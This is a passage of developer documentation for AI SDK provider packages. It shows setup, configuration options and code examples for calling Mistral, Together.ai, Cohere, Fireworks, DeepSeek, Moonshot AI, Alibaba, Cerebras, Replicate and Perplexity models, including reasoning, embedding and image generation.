import { mistral } from '@ai-sdk/mistral';
import { generateObject } from 'ai';
import { z } from 'zod';

const result = await generateObject({
  model: mistral('mistral-large-latest'),
  providerOptions: {
    mistral: {
      strictJsonSchema: true, // reject outputs that don't strictly match the schema
    },
  },
  schema: z.object({
    title: z.string(),
    items: z.array(z.object({ id: z.string(), qty: z.number().int().min(1) })),
  }),
  prompt: 'Generate a small shopping list.',
});

Model Capabilities

Model	Image Input	Object Generation	Tool Usage	Tool Streaming
`pixtral-large-latest`
`mistral-large-latest`
`mistral-medium-latest`
`mistral-medium-2505`
`mistral-small-latest`
`magistral-small-2506`
`magistral-medium-2506`
`ministral-3b-latest`
`ministral-8b-latest`
`pixtral-12b-2409`
`open-mistral-7b`
`open-mixtral-8x7b`
`open-mixtral-8x22b`

Embedding Models

You can create models that call the Mistral embeddings API using the .textEmbedding() factory method.

const model = mistral.textEmbedding('mistral-embed');

You can use Mistral embedding models to generate embeddings with the embed function:

import { mistral } from '@ai-sdk/mistral';
import { embed } from 'ai';

const { embedding } = await embed({
  model: mistral.textEmbedding('mistral-embed'),
  value: 'sunny day at the beach',
});

Model Capabilities

Model	Default Dimensions
`mistral-embed`	1024

title: Together.ai description: Learn how to use Together.ai's models with the AI SDK.

Together.ai Provider

The Together.ai provider contains support for 200+ open-source models through the Together.ai API.

Setup

The Together.ai provider is available via the @ai-sdk/togetherai module. You can install it with

Provider Instance

You can import the default provider instance togetherai from @ai-sdk/togetherai:

import { togetherai } from '@ai-sdk/togetherai';

If you need a customized setup, you can import createTogetherAI from @ai-sdk/togetherai and create a provider instance with your settings:

import { createTogetherAI } from '@ai-sdk/togetherai';

const togetherai = createTogetherAI({
  apiKey: process.env.TOGETHER_API_KEY ?? '',
});

You can use the following optional settings to customize the Together.ai provider instance:

baseURL string

Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is https://api.together.xyz/v1.
apiKey string

API key that is being sent using the Authorization header. It defaults to the TOGETHER_API_KEY environment variable.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.

Language Models

You can create Together.ai models using a provider instance. The first argument is the model id, e.g. google/gemma-2-9b-it.

const model = togetherai('google/gemma-2-9b-it');

Reasoning Models

import { togetherai } from '@ai-sdk/togetherai';
import { wrapLanguageModel, extractReasoningMiddleware } from 'ai';

const enhancedModel = wrapLanguageModel({
  model: togetherai('deepseek-ai/DeepSeek-R1'),
  middleware: extractReasoningMiddleware({ tagName: 'think' }),
});

You can then use that enhanced model in functions like generateText and streamText.

Example

You can use Together.ai language models to generate text with the generateText function:

import { togetherai } from '@ai-sdk/togetherai';
import { generateText } from 'ai';

const { text } = await generateText({
  model: togetherai('meta-llama/Meta-Llama-3.1-8B-Instruct-Turbo'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});

Together.ai language models can also be used in the streamText function (see AI SDK Core).

The Together.ai provider also supports completion models via (following the above example code) togetherai.completion() and embedding models via togetherai.textEmbedding().

Model Capabilities

Model	Image Input	Object Generation	Tool Usage	Tool Streaming
`meta-llama/Meta-Llama-3.3-70B-Instruct-Turbo`
`meta-llama/Meta-Llama-3.1-8B-Instruct-Turbo`
`mistralai/Mixtral-8x22B-Instruct-v0.1`
`mistralai/Mistral-7B-Instruct-v0.3`
`deepseek-ai/DeepSeek-V3`
`google/gemma-2b-it`
`Qwen/Qwen2.5-72B-Instruct-Turbo`
`databricks/dbrx-instruct`

Image Models

You can create Together.ai image models using the .image() factory method. For more on image generation with the AI SDK see generateImage().

import { togetherai } from '@ai-sdk/togetherai';
import { experimental_generateImage as generateImage } from 'ai';

const { images } = await generateImage({
  model: togetherai.image('black-forest-labs/FLUX.1-dev'),
  prompt: 'A delighted resplendent quetzal mid flight amidst raindrops',
});

You can pass optional provider-specific request parameters using the providerOptions argument.

import { togetherai } from '@ai-sdk/togetherai';
import { experimental_generateImage as generateImage } from 'ai';

const { images } = await generateImage({
  model: togetherai.image('black-forest-labs/FLUX.1-dev'),
  prompt: 'A delighted resplendent quetzal mid flight amidst raindrops',
  size: '512x512',
  // Optional additional provider-specific request parameters
  providerOptions: {
    togetherai: {
      steps: 40,
    },
  },
});

For a complete list of available provider-specific options, see the Together.ai Image Generation API Reference.

Model Capabilities

Available Models
`stabilityai/stable-diffusion-xl-base-1.0`
`black-forest-labs/FLUX.1-dev`
`black-forest-labs/FLUX.1-dev-lora`
`black-forest-labs/FLUX.1-schnell`
`black-forest-labs/FLUX.1-canny`
`black-forest-labs/FLUX.1-depth`
`black-forest-labs/FLUX.1-redux`
`black-forest-labs/FLUX.1.1-pro`
`black-forest-labs/FLUX.1-pro`
`black-forest-labs/FLUX.1-schnell-Free`

Embedding Models

You can create Together.ai embedding models using the .textEmbedding() factory method. For more on embedding models with the AI SDK see embed().

import { togetherai } from '@ai-sdk/togetherai';
import { embed } from 'ai';

const { embedding } = await embed({
  model: togetherai.textEmbedding('togethercomputer/m2-bert-80M-2k-retrieval'),
  value: 'sunny day at the beach',
});

Model Capabilities

Model	Dimensions	Max Tokens
`togethercomputer/m2-bert-80M-2k-retrieval`	768	2048
`togethercomputer/m2-bert-80M-8k-retrieval`	768	8192
`togethercomputer/m2-bert-80M-32k-retrieval`	768	32768
`WhereIsAI/UAE-Large-V1`	1024	512
`BAAI/bge-large-en-v1.5`	1024	512
`BAAI/bge-base-en-v1.5`	768	512
`sentence-transformers/msmarco-bert-base-dot-v5`	768	512
`bert-base-uncased`	768	512

title: Cohere description: Learn how to use the Cohere provider for the AI SDK.

Cohere Provider

The Cohere provider contains language and embedding model support for the Cohere chat API.

Setup

The Cohere provider is available in the @ai-sdk/cohere module. You can install it with

Provider Instance

You can import the default provider instance cohere from @ai-sdk/cohere:

import { cohere } from '@ai-sdk/cohere';

If you need a customized setup, you can import createCohere from @ai-sdk/cohere and create a provider instance with your settings:

import { createCohere } from '@ai-sdk/cohere';

const cohere = createCohere({
  // custom settings
});

You can use the following optional settings to customize the Cohere provider instance:

baseURL string

Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is https://api.cohere.com/v2.
apiKey string

API key that is being sent using the Authorization header. It defaults to the COHERE_API_KEY environment variable.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.

Language Models

You can create models that call the Cohere chat API using a provider instance. The first argument is the model id, e.g. command-r-plus. Some Cohere chat models support tool calls.

const model = cohere('command-r-plus');

Example

You can use Cohere language models to generate text with the generateText function:

import { cohere } from '@ai-sdk/cohere';
import { generateText } from 'ai';

const { text } = await generateText({
  model: cohere('command-r-plus'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});

Cohere language models can also be used in the streamText, generateObject, and streamObject functions (see AI SDK Core.

Model Capabilities

Model	Image Input	Object Generation	Tool Usage	Tool Streaming
`command-a-03-2025`
`command-a-reasoning-08-2025`
`command-r7b-12-2024`
`command-r-plus-04-2024`
`command-r-plus`
`command-r-08-2024`
`command-r-03-2024`
`command-r`
`command`
`command-nightly`
`command-light`
`command-light-nightly`

Reasoning

Cohere has introduced reasoning with the command-a-reasoning-08-2025 model. You can learn more at https://docs.cohere.com/docs/reasoning.

import { cohere } from '@ai-sdk/cohere';
import { generateText } from 'ai';

async function main() {
  const { text, reasoning } = await generateText({
    model: cohere('command-a-reasoning-08-2025'),
    prompt:
      "Alice has 3 brothers and she also has 2 sisters. How many sisters does Alice's brother have?",
    // optional: reasoning options
    providerOptions: {
      cohere: {
        thinking: {
          type: 'enabled',
          tokenBudget: 100,
        },
      },
    },
  });

  console.log(reasoning);
  console.log(text);
}

main().catch(console.error);

Embedding Models

You can create models that call the Cohere embed API using the .textEmbedding() factory method.

const model = cohere.textEmbedding('embed-english-v3.0');

You can use Cohere embedding models to generate embeddings with the embed function:

import { cohere } from '@ai-sdk/cohere';
import { embed } from 'ai';

const { embedding } = await embed({
  model: cohere.textEmbedding('embed-english-v3.0'),
  value: 'sunny day at the beach',
  providerOptions: {
    cohere: {
      inputType: 'search_document',
    },
  },
});

Cohere embedding models support additional provider options that can be passed via providerOptions.cohere:

import { cohere } from '@ai-sdk/cohere';
import { embed } from 'ai';

const { embedding } = await embed({
  model: cohere.textEmbedding('embed-english-v3.0'),
  value: 'sunny day at the beach',
  providerOptions: {
    cohere: {
      inputType: 'search_document',
      truncate: 'END',
    },
  },
});

The following provider options are available:

inputType 'search_document' | 'search_query' | 'classification' | 'clustering'

Specifies the type of input passed to the model. Default is search_query.
- search_document: Used for embeddings stored in a vector database for search use-cases.
- search_query: Used for embeddings of search queries run against a vector DB to find relevant documents.
- classification: Used for embeddings passed through a text classifier.
- clustering: Used for embeddings run through a clustering algorithm.
truncate 'NONE' | 'START' | 'END'

Specifies how the API will handle inputs longer than the maximum token length. Default is END.
- NONE: If selected, when the input exceeds the maximum input token length will return an error.
- START: Will discard the start of the input until the remaining input is exactly the maximum input token length for the model.
- END: Will discard the end of the input until the remaining input is exactly the maximum input token length for the model.

Model Capabilities

Model	Embedding Dimensions
`embed-english-v3.0`	1024
`embed-multilingual-v3.0`	1024
`embed-english-light-v3.0`	384
`embed-multilingual-light-v3.0`	384
`embed-english-v2.0`	4096
`embed-english-light-v2.0`	1024
`embed-multilingual-v2.0`	768

title: Fireworks description: Learn how to use Fireworks models with the AI SDK.

Fireworks Provider

Fireworks is a platform for running and testing LLMs through their API.

Setup

The Fireworks provider is available via the @ai-sdk/fireworks module. You can install it with

Provider Instance

You can import the default provider instance fireworks from @ai-sdk/fireworks:

import { fireworks } from '@ai-sdk/fireworks';

If you need a customized setup, you can import createFireworks from @ai-sdk/fireworks and create a provider instance with your settings:

import { createFireworks } from '@ai-sdk/fireworks';

const fireworks = createFireworks({
  apiKey: process.env.FIREWORKS_API_KEY ?? '',
});

You can use the following optional settings to customize the Fireworks provider instance:

baseURL string

Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is https://api.fireworks.ai/inference/v1.
apiKey string

API key that is being sent using the Authorization header. It defaults to the FIREWORKS_API_KEY environment variable.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation.

Language Models

You can create Fireworks models using a provider instance. The first argument is the model id, e.g. accounts/fireworks/models/firefunction-v1:

const model = fireworks('accounts/fireworks/models/firefunction-v1');

Reasoning Models

import { fireworks } from '@ai-sdk/fireworks';
import { wrapLanguageModel, extractReasoningMiddleware } from 'ai';

const enhancedModel = wrapLanguageModel({
  model: fireworks('accounts/fireworks/models/deepseek-r1'),
  middleware: extractReasoningMiddleware({ tagName: 'think' }),
});

You can then use that enhanced model in functions like generateText and streamText.

Example

You can use Fireworks language models to generate text with the generateText function:

import { fireworks } from '@ai-sdk/fireworks';
import { generateText } from 'ai';

const { text } = await generateText({
  model: fireworks('accounts/fireworks/models/firefunction-v1'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});

Fireworks language models can also be used in the streamText function (see AI SDK Core).

Completion Models

You can create models that call the Fireworks completions API using the .completion() factory method:

const model = fireworks.completion('accounts/fireworks/models/firefunction-v1');

Model Capabilities

Model	Image Input	Object Generation	Tool Usage	Tool Streaming
`accounts/fireworks/models/firefunction-v1`
`accounts/fireworks/models/deepseek-r1`
`accounts/fireworks/models/deepseek-v3`
`accounts/fireworks/models/llama-v3p1-405b-instruct`
`accounts/fireworks/models/llama-v3p1-8b-instruct`
`accounts/fireworks/models/llama-v3p2-3b-instruct`
`accounts/fireworks/models/llama-v3p3-70b-instruct`
`accounts/fireworks/models/mixtral-8x7b-instruct`
`accounts/fireworks/models/mixtral-8x7b-instruct-hf`
`accounts/fireworks/models/mixtral-8x22b-instruct`
`accounts/fireworks/models/qwen2p5-coder-32b-instruct`
`accounts/fireworks/models/qwen2p5-72b-instruct`
`accounts/fireworks/models/qwen-qwq-32b-preview`
`accounts/fireworks/models/qwen2-vl-72b-instruct`
`accounts/fireworks/models/llama-v3p2-11b-vision-instruct`
`accounts/fireworks/models/qwq-32b`
`accounts/fireworks/models/yi-large`
`accounts/fireworks/models/kimi-k2-instruct`

Embedding Models

You can create models that call the Fireworks embeddings API using the .textEmbedding() factory method:

const model = fireworks.textEmbedding('nomic-ai/nomic-embed-text-v1.5');

You can use Fireworks embedding models to generate embeddings with the embed function:

import { fireworks } from '@ai-sdk/fireworks';
import { embed } from 'ai';

const { embedding } = await embed({
  model: fireworks.textEmbedding('nomic-ai/nomic-embed-text-v1.5'),
  value: 'sunny day at the beach',
});

Model Capabilities

Model	Dimensions	Max Tokens
`nomic-ai/nomic-embed-text-v1.5`	768	8192

Image Models

You can create Fireworks image models using the .image() factory method. For more on image generation with the AI SDK see generateImage().

import { fireworks } from '@ai-sdk/fireworks';
import { experimental_generateImage as generateImage } from 'ai';

const { image } = await generateImage({
  model: fireworks.image('accounts/fireworks/models/flux-1-dev-fp8'),
  prompt: 'A futuristic cityscape at sunset',
  aspectRatio: '16:9',
});

Model Capabilities

For all models supporting aspect ratios, the following aspect ratios are supported:

1:1 (default), 2:3, 3:2, 4:5, 5:4, 16:9, 9:16, 9:21, 21:9

For all models supporting size, the following sizes are supported:

640 x 1536, 768 x 1344, 832 x 1216, 896 x 1152, 1024x1024 (default), 1152 x 896, 1216 x 832, 1344 x 768, 1536 x 640

Model	Dimensions Specification
`accounts/fireworks/models/flux-1-dev-fp8`	Aspect Ratio
`accounts/fireworks/models/flux-1-schnell-fp8`	Aspect Ratio
`accounts/fireworks/models/playground-v2-5-1024px-aesthetic`	Size
`accounts/fireworks/models/japanese-stable-diffusion-xl`	Size
`accounts/fireworks/models/playground-v2-1024px-aesthetic`	Size
`accounts/fireworks/models/SSD-1B`	Size
`accounts/fireworks/models/stable-diffusion-xl-1024-v1-0`	Size

For more details, see the Fireworks models page.

Stability AI Models

Fireworks also presents several Stability AI models backed by Stability AI API keys and endpoint. The AI SDK Fireworks provider does not currently include support for these models:

Model ID
`accounts/stability/models/sd3-turbo`
`accounts/stability/models/sd3-medium`
`accounts/stability/models/sd3`

title: DeepSeek description: Learn how to use DeepSeek's models with the AI SDK.

DeepSeek Provider

The DeepSeek provider offers access to powerful language models through the DeepSeek API.

API keys can be obtained from the DeepSeek Platform.

Setup

The DeepSeek provider is available via the @ai-sdk/deepseek module. You can install it with:

Provider Instance

You can import the default provider instance deepseek from @ai-sdk/deepseek:

import { deepseek } from '@ai-sdk/deepseek';

For custom configuration, you can import createDeepSeek and create a provider instance with your settings:

import { createDeepSeek } from '@ai-sdk/deepseek';

const deepseek = createDeepSeek({
  apiKey: process.env.DEEPSEEK_API_KEY ?? '',
});

You can use the following optional settings to customize the DeepSeek provider instance:

baseURL string

Use a different URL prefix for API calls. The default prefix is https://api.deepseek.com/v1.
apiKey string

API key that is being sent using the Authorization header. It defaults to the DEEPSEEK_API_KEY environment variable.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation.

Language Models

You can create language models using a provider instance:

import { deepseek } from '@ai-sdk/deepseek';
import { generateText } from 'ai';

const { text } = await generateText({
  model: deepseek('deepseek-chat'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});

You can also use the .chat() or .languageModel() factory methods:

const model = deepseek.chat('deepseek-chat');
// or
const model = deepseek.languageModel('deepseek-chat');

DeepSeek language models can be used in the streamText function (see AI SDK Core).

Reasoning

DeepSeek has reasoning support for the deepseek-reasoner model. The reasoning is exposed through streaming:

import { deepseek } from '@ai-sdk/deepseek';
import { streamText } from 'ai';

const result = streamText({
  model: deepseek('deepseek-reasoner'),
  prompt: 'How many "r"s are in the word "strawberry"?',
});

for await (const part of result.fullStream) {
  if (part.type === 'reasoning') {
    // This is the reasoning text
    console.log('Reasoning:', part.text);
  } else if (part.type === 'text') {
    // This is the final answer
    console.log('Answer:', part.text);
  }
}

See AI SDK UI: Chatbot for more details on how to integrate reasoning into your chatbot.

Cache Token Usage

import { deepseek } from '@ai-sdk/deepseek';
import { generateText } from 'ai';

const result = await generateText({
  model: deepseek('deepseek-chat'),
  prompt: 'Your prompt here',
});

console.log(result.providerMetadata);
// Example output: { deepseek: { promptCacheHitTokens: 1856, promptCacheMissTokens: 5 } }

The metrics include:

promptCacheHitTokens: Number of input tokens that were cached
promptCacheMissTokens: Number of input tokens that were not cached

Model Capabilities

Model	Text Generation	Object Generation	Image Input	Tool Usage	Tool Streaming
`deepseek-chat`
`deepseek-reasoner`

title: Moonshot AI description: Learn how to use Moonshot AI models with the AI SDK.

Moonshot AI Provider

The Moonshot AI provider offers access to powerful language models through the Moonshot API, including the Kimi series of models with reasoning capabilities.

API keys can be obtained from the Moonshot Platform.

Setup

The Moonshot AI provider is available via the @ai-sdk/moonshotai module. You can install it with:

Provider Instance

You can import the default provider instance moonshotai from @ai-sdk/moonshotai:

import { moonshotai } from '@ai-sdk/moonshotai';

For custom configuration, you can import createMoonshotAI and create a provider instance with your settings:

import { createMoonshotAI } from '@ai-sdk/moonshotai';

const moonshotai = createMoonshotAI({
  apiKey: process.env.MOONSHOT_API_KEY ?? '',
});

You can use the following optional settings to customize the Moonshot AI provider instance:

baseURL string

Use a different URL prefix for API calls. The default prefix is https://api.moonshot.ai/v1
apiKey string

API key that is being sent using the Authorization header. It defaults to the MOONSHOT_API_KEY environment variable
headers Record<string,string>

Custom headers to include in the requests
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation

Language Models

You can create language models using a provider instance:

import { moonshotai } from '@ai-sdk/moonshotai';
import { generateText } from 'ai';

const { text } = await generateText({
  model: moonshotai('kimi-k2.5'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});

You can also use the .chatModel() or .languageModel() factory methods:

const model = moonshotai.chatModel('kimi-k2.5');
// or
const model = moonshotai.languageModel('kimi-k2.5');

Moonshot AI language models can be used in the streamText function (see AI SDK Core).

Reasoning Models

Moonshot AI offers thinking models like kimi-k2-thinking that generate intermediate reasoning tokens before their final response. The reasoning output is streamed through the standard AI SDK reasoning parts.

import { moonshotai, type MoonshotAIProviderOptions } from '@ai-sdk/moonshotai';
import { generateText } from 'ai';

const { text, reasoningText } = await generateText({
  model: moonshotai('kimi-k2-thinking'),
  providerOptions: {
    moonshotai: {
      thinking: { type: 'enabled', budgetTokens: 2048 },
      reasoningHistory: 'interleaved',
    } satisfies MoonshotAIProviderOptions,
  },
  prompt: 'How many "r"s are in the word "strawberry"?',
});

console.log(reasoningText);
console.log(text);

See AI SDK UI: Chatbot for more details on how to integrate reasoning into your chatbot.

Provider Options

The following optional provider options are available for Moonshot AI language models:

thinking object

Configuration for thinking/reasoning models like Kimi K2 Thinking.
- type 'enabled' | 'disabled'
  
  Whether to enable thinking mode
- budgetTokens number
  
  Maximum number of tokens for thinking (minimum 1024)
reasoningHistory 'disabled' | 'interleaved' | 'preserved'

Controls how reasoning history is handled in multi-turn conversations:
- 'disabled': Remove reasoning from history
- 'interleaved': Include reasoning between tool calls within a single turn
- 'preserved': Keep all reasoning in history

Model Capabilities

Model	Image Input	Object Generation	Tool Usage	Tool Streaming
`moonshot-v1-8k`
`moonshot-v1-32k`
`moonshot-v1-128k`
`kimi-k2`
`kimi-k2.5`
`kimi-k2-thinking`
`kimi-k2-thinking-turbo`
`kimi-k2-turbo`

title: Alibaba description: Learn how to use Alibaba Cloud Model Studio (Qwen) models with the AI SDK.

Alibaba Provider

Alibaba Cloud Model Studio provides access to the Qwen model series, including advanced reasoning capabilities.

API keys can be obtained from the Console.

Setup

The Alibaba provider is available via the @ai-sdk/alibaba module. You can install it with:

Provider Instance

You can import the default provider instance alibaba from @ai-sdk/alibaba:

import { alibaba } from '@ai-sdk/alibaba';

For custom configuration, you can import createAlibaba and create a provider instance with your settings:

import { createAlibaba } from '@ai-sdk/alibaba';

const alibaba = createAlibaba({
  apiKey: process.env.ALIBABA_API_KEY ?? '',
});

You can use the following optional settings to customize the Alibaba provider instance:

baseURL string

Use a different URL prefix for API calls, e.g. to use proxy servers or regional endpoints. The default prefix is https://dashscope-intl.aliyuncs.com/compatible-mode/v1.
apiKey string

API key that is being sent using the Authorization header. It defaults to the ALIBABA_API_KEY environment variable.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation.
includeUsage boolean

Include usage information in streaming responses. When enabled, token usage will be included in the final chunk. Defaults to true.

Language Models

You can create language models using a provider instance:

import { alibaba } from '@ai-sdk/alibaba';
import { generateText } from 'ai';

const { text } = await generateText({
  model: alibaba('qwen-plus'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});

You can also use the .chatModel() or .languageModel() factory methods:

const model = alibaba.chatModel('qwen-plus');
// or
const model = alibaba.languageModel('qwen-plus');

Alibaba language models can be used in the streamText function (see AI SDK Core).

The following optional provider options are available for Alibaba models:

enableThinking boolean

Enable thinking/reasoning mode for supported models. When enabled, the model generates reasoning content before the response. Defaults to false.
thinkingBudget number

Maximum number of reasoning tokens to generate. Limits the length of thinking content.
parallelToolCalls boolean

Whether to enable parallel function calling during tool use. Defaults to true.

Thinking Mode

Alibaba's Qwen models support thinking/reasoning mode for complex problem-solving:

import { alibaba } from '@ai-sdk/alibaba';
import { generateText } from 'ai';

const { text, reasoning } = await generateText({
  model: alibaba('qwen3-max'),
  providerOptions: {
    alibaba: {
      enableThinking: true,
      thinkingBudget: 2048,
    },
  },
  prompt: 'How many "r"s are in the word "strawberry"?',
});

console.log('Reasoning:', reasoning);
console.log('Answer:', text);

For models that are thinking-only (like qwen3-235b-a22b-thinking-2507), thinking mode is enabled by default.

Tool Calling

Alibaba models support tool calling with parallel execution:

import { alibaba } from '@ai-sdk/alibaba';
import { generateText, tool } from 'ai';
import { z } from 'zod';

const { text } = await generateText({
  model: alibaba('qwen-plus'),
  tools: {
    weather: tool({
      description: 'Get the weather in a location',
      parameters: z.object({
        location: z.string().describe('The location to get the weather for'),
      }),
      execute: async ({ location }) => ({
        location,
        temperature: 72 + Math.floor(Math.random() * 21) - 10,
      }),
    }),
  },
  prompt: 'What is the weather in San Francisco?',
});

Prompt Caching

Alibaba supports both implicit and explicit prompt caching to reduce costs for repeated prompts.

Implicit caching works automatically - the provider caches appropriate content without any configuration. For more control, you can use explicit caching by marking specific messages with cache_control:

Single message cache control

import { alibaba } from '@ai-sdk/alibaba';
import { generateText } from 'ai';

const { text, usage } = await generateText({
  model: alibaba('qwen-plus'),
  messages: [
    {
      role: 'system',
      content: 'You are a helpful assistant. [... long system prompt ...]',
      providerOptions: {
        alibaba: {
          cache_control: { type: 'ephemeral' },
        },
      },
    },
  ],
});

Multi-part message cache control

import { alibaba } from '@ai-sdk/alibaba';
import { generateText } from 'ai';

const longDocument = '... large document content ...';

const { text, usage } = await generateText({
  model: alibaba('qwen-plus'),
  messages: [
    {
      role: 'user',
      content: [
        {
          type: 'text',
          text: 'Context: Please analyze this document.',
        },
        {
          type: 'text',
          text: longDocument,
          providerOptions: {
            alibaba: {
              cacheControl: { type: 'ephemeral' },
            },
          },
        },
      ],
    },
  ],
});

Note: The minimum content length for a cache block is 1,024 tokens.

Model Capabilities

Please see the Alibaba Cloud Model Studio docs for a full list of available models. You can also pass any available provider model ID as a string if needed.

title: Cerebras description: Learn how to use Cerebras's models with the AI SDK.

Cerebras Provider

The Cerebras provider offers access to powerful language models through the Cerebras API, including their high-speed inference capabilities powered by Wafer-Scale Engines and CS-3 systems.

API keys can be obtained from the Cerebras Platform.

Setup

The Cerebras provider is available via the @ai-sdk/cerebras module. You can install it with:

Provider Instance

You can import the default provider instance cerebras from @ai-sdk/cerebras:

import { cerebras } from '@ai-sdk/cerebras';

For custom configuration, you can import createCerebras and create a provider instance with your settings:

import { createCerebras } from '@ai-sdk/cerebras';

const cerebras = createCerebras({
  apiKey: process.env.CEREBRAS_API_KEY ?? '',
});

You can use the following optional settings to customize the Cerebras provider instance:

baseURL string

Use a different URL prefix for API calls. The default prefix is https://api.cerebras.ai/v1.
apiKey string

API key that is being sent using the Authorization header. It defaults to the CEREBRAS_API_KEY environment variable.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation.

Language Models

You can create language models using a provider instance:

import { cerebras } from '@ai-sdk/cerebras';
import { generateText } from 'ai';

const { text } = await generateText({
  model: cerebras('llama3.1-8b'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});

Cerebras language models can be used in the streamText function (see AI SDK Core).

You can create Cerebras language models using a provider instance. The first argument is the model ID, e.g. llama-3.3-70b:

const model = cerebras('llama-3.3-70b');

You can also use the .languageModel() and .chat() methods:

const model = cerebras.languageModel('llama-3.3-70b');
const model = cerebras.chat('llama-3.3-70b');

Model Capabilities

Model	Image Input	Object Generation	Tool Usage	Tool Streaming
`llama3.1-8b`
`llama-3.3-70b`
`gpt-oss-120b`
`qwen-3-32b`
`qwen-3-235b-a22b-instruct-2507`
`qwen-3-235b-a22b-thinking-2507`
`zai-glm-4.6`

title: Replicate description: Learn how to use Replicate models with the AI SDK.

Replicate Provider

Replicate is a platform for running open-source AI models. It is a popular choice for running image generation models.

Setup

The Replicate provider is available via the @ai-sdk/replicate module. You can install it with

Provider Instance

You can import the default provider instance replicate from @ai-sdk/replicate:

import { replicate } from '@ai-sdk/replicate';

If you need a customized setup, you can import createReplicate from @ai-sdk/replicate and create a provider instance with your settings:

import { createReplicate } from '@ai-sdk/replicate';

const replicate = createReplicate({
  apiToken: process.env.REPLICATE_API_TOKEN ?? '',
});

You can use the following optional settings to customize the Replicate provider instance:

baseURL string

Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is https://api.replicate.com/v1.
apiToken string

API token that is being sent using the Authorization header. It defaults to the REPLICATE_API_TOKEN environment variable.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation.

Image Models

You can create Replicate image models using the .image() factory method. For more on image generation with the AI SDK see generateImage().

Supported Image Models

The following image models are currently supported by the Replicate provider:

Basic Usage

import { replicate } from '@ai-sdk/replicate';
import { experimental_generateImage as generateImage } from 'ai';
import { writeFile } from 'node:fs/promises';

const { image } = await generateImage({
  model: replicate.image('black-forest-labs/flux-schnell'),
  prompt: 'The Loch Ness Monster getting a manicure',
  aspectRatio: '16:9',
});

await writeFile('image.webp', image.uint8Array);

console.log('Image saved as image.webp');

Model-specific options

import { replicate } from '@ai-sdk/replicate';
import { experimental_generateImage as generateImage } from 'ai';

const { image } = await generateImage({
  model: replicate.image('recraft-ai/recraft-v3'),
  prompt: 'The Loch Ness Monster getting a manicure',
  size: '1365x1024',
  providerOptions: {
    replicate: {
      style: 'realistic_image',
    },
  },
});

Versioned Models

import { replicate } from '@ai-sdk/replicate';
import { experimental_generateImage as generateImage } from 'ai';

const { image } = await generateImage({
  model: replicate.image(
    'bytedance/sdxl-lightning-4step:5599ed30703defd1d160a25a63321b4dec97101d98b4674bcc56e41f62f35637',
  ),
  prompt: 'The Loch Ness Monster getting a manicure',
});

For more details, see the Replicate models page.

title: Perplexity description: Learn how to use Perplexity's Sonar API with the AI SDK.

Perplexity Provider

API keys can be obtained from the Perplexity Platform.

Setup

The Perplexity provider is available via the @ai-sdk/perplexity module. You can install it with:

Provider Instance

You can import the default provider instance perplexity from @ai-sdk/perplexity:

import { perplexity } from '@ai-sdk/perplexity';

For custom configuration, you can import createPerplexity and create a provider instance with your settings:

import { createPerplexity } from '@ai-sdk/perplexity';

const perplexity = createPerplexity({
  apiKey: process.env.PERPLEXITY_API_KEY ?? '',
});

You can use the following optional settings to customize the Perplexity provider instance:

baseURL string

Use a different URL prefix for API calls. The default prefix is https://api.perplexity.ai.
apiKey string

API key that is being sent using the Authorization header. It defaults to the PERPLEXITY_API_KEY environment variable.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation.

Language Models

You can create Perplexity models using a provider instance:

import { perplexity } from '@ai-sdk/perplexity';
import { generateText } from 'ai';

const { text } = await generateText({
  model: perplexity('sonar-pro'),
  prompt: 'What are the latest developments in quantum computing?',
});

Sources

Websites that have been used to generate the response are included in the sources property of the result:

import { perplexity } from '@ai-sdk/perplexity';
import { generateText } from 'ai';

const { text, sources } = await generateText({
  model: perplexity('sonar-pro'),
  prompt: 'What are the latest developments in quantum computing?',
});

console.log(sources);

Provider Options & Metadata

The Perplexity provider includes additional metadata in the response through providerMetadata. Additional configuration options are available through providerOptions.

const result = await generateText({
  model: perplexity('sonar-pro'),
  prompt: 'What are the latest developments in quantum computing?',
  providerOptions: {
    perplexity: {
      return_images: true, // Enable image responses (Tier-2 Perplexity users only)
    },
  },
});

console.log(result.providerMetadata);
// Example output:
// {
//   perplexity: {
//     usage: { citationTokens: 5286, numSearchQueries: 1 },
//     images: [
//       { imageUrl: "https://example.com/image1.jpg", originUrl: "https://elsewhere.com/page1", height: 1280, width: 720 },
//       { imageUrl: "https://example.com/image2.jpg", originUrl: "https://elsewhere.com/page2", height: 1280, width: 720 }
//     ]
//   },
// }

The metadata includes:

usage: Object containing citationTokens and numSearchQueries metrics
images: Array of image URLs when return_images is enabled (Tier-2 users only)

You can enable image responses by setting return_images: true in the provider options. This feature is only available to Perplexity Tier-2 users and above.

PDF Support

The Perplexity provider supports reading PDF files. You can pass PDF files as part of the message content using the file type:

const result = await generateText({
  model: perplexity('sonar-pro'),
  messages: [
    {
      role: 'user',
      content: [
        {
